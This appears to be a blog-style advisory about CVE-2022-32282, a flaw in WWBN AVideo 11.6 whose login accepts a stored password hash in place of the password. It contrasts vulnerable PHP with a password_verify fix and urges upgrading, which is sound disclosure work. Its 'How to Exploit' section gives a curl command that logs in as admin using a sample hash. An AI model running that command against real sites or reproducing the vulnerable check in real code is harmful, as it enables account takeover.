If you run or use WWBN AVideo for hosting video content, you need to know about CVE-2022-32282. This security vulnerability, found in AVideo version 11.6 and development commit 3f7c0364, makes it possible for attackers to use password *hashes*—instead of the real password—to log in as any user. This flaw can give attackers full account access, putting both user data and privileges at risk.

What is AVideo?

AVideo (formerly YouPHPTube) is a free, open-source video sharing platform. It’s popular for self-hosted YouTube-like platforms, especially in schools, businesses, and independent video sites. You can find it on GitHub.

The Vulnerability: Improper Password Hash Check

The vulnerability happens because the login system doesn't properly verify the user’s password, as it accepts a password hash for authentication. This is a big problem because anyone who can get a user's hash (from a database leak or access) can log in as that user—without ever knowing the real password.

In simple words: If someone steals a hash, they can use it directly to get in.

Where is the Bug?

The issue is in the PHP code for user login. Normally, the system should compare the *hash of the input password* with what's stored in the database.

But, AVideo 11.6 just accepts the stored password hash as-is.

Here's a simplified version of the vulnerable code from AVideo

// Vulnerable code (simplified for clarity)

$password = $_POST['password'];
$user = getUserFromDatabase($_POST['username']);

if ($password == $user['password']) {
    // User is authenticated!
}

In secure systems, the code would look more like this

// Secure approach (using password_hash and password_verify in PHP)
$password = $_POST['password'];
$user = getUserFromDatabase($_POST['username']);

if (password_verify($password, $user['password'])) {
    // User is authenticated!
}

What Went Wrong?

In the vulnerable approach, if $password equals the stored *hash* (not the raw password), you get in. So, attackers who have *any user’s password hash* (from a database dump, for example) can simply input that hash in the password field and gain access.

How to Exploit CVE-2022-32282

Let's imagine you have a user hash:  
$2y$10$TKh8H1.P7VOSq1UOEhaA.eFS8j5bHDbXZObc2yDZG3pHdQ2oKRG6m  

You simply go to the login page, enter the user’s username or email, and paste the hash itself as the password.

Sample exploit (using curl)

curl -X POST https://target.site/login.php \
    -d "username=admin" \
    -d "password=$2y$10$TKh8H1.P7VOSq1UOEhaA.eFS8j5bHDbXZObc2yDZG3pHdQ2oKRG6m"

Update Immediately:

The AVideo devs have patched this in later versions. Check for current releases.

- CVE Details: CVE-2022-32282
- Original GitHub Issue
- AVideo GitHub
- NVD Vulnerability Details

Conclusion

CVE-2022-32282 is a critical reminder: properly handling passwords is important in any web application. Never trust that people won’t get access to your encrypted data—they might, and then, thanks to bugs like this, they might walk right in your digital front door.

If you’re running WWBN AVideo, upgrade now. And always review login and authentication logic for similar shortcuts!


*Stay secure! For any questions or remediation help, reach out to security professionals or the AVideo community.*

Timeline

Published on: 08/22/2022 19:15:00 UTC
Last modified on: 08/26/2022 14:58:00 UTC